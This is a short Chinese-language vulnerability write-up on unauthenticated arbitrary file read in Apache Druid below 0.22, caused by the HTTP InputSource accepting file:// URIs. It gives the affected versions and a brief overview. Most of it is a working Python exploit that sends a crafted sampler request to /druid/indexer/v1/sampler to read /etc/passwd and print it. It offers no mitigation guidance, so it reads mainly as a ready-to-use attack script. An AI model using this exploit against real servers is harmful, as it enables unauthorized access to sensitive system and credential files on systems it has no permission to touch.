Apache Druid 任意文件读取

Apache Druid 任意文件读取

漏洞影响版本

Apache Druid Version < 0.22

漏洞概述

对用户指定的 HTTP InputSource 没有做出限制，可以通过将文件 URL 传递给 HTTP InputSource 来绕过应用程序级别的限制。由于 Apache Druid 默认情况下是缺乏授权认证，攻击者可利用该漏洞在未授权情况下，构造恶意请求执行文件读取，最终造成服务器敏感性信息泄露。

漏洞复现

利用file协议来读取文件

python exp

读取/etc/passwd

import requests
import json
url = "http://127.0.0.1/druid/indexer/v1/sampler?for=connect"
headers = {
    "Content-Type": "application/json"
}
data = {
    "type":"index","spec":{
    "type":"index","ioConfig":{
    "type":"index","inputSource":{
    "type":"http","uris":["file:///etc/passwd"]},"inputFormat":{
    "type":"regex","pattern":"(.*)","listDelimiter":"56616469-6de2-9da4-efb8-8f416e6e6965","columns":["raw"]}},"dataSchema":{
    "dataSource":"sample","timestampSpec":{
    "column":"!!!_no_such_column_!!!","missingValue":"1970-01-01T00:00:00Z"},"dimensionsSpec":{
    }},"tuningConfig":{
    "type":"index"}},"samplerConfig":{
    "numRows":500,"timeoutMs":15000}}
r = requests.post(url,headers=headers,data=json.dumps(data),timeout=3)
print(r.content.decode())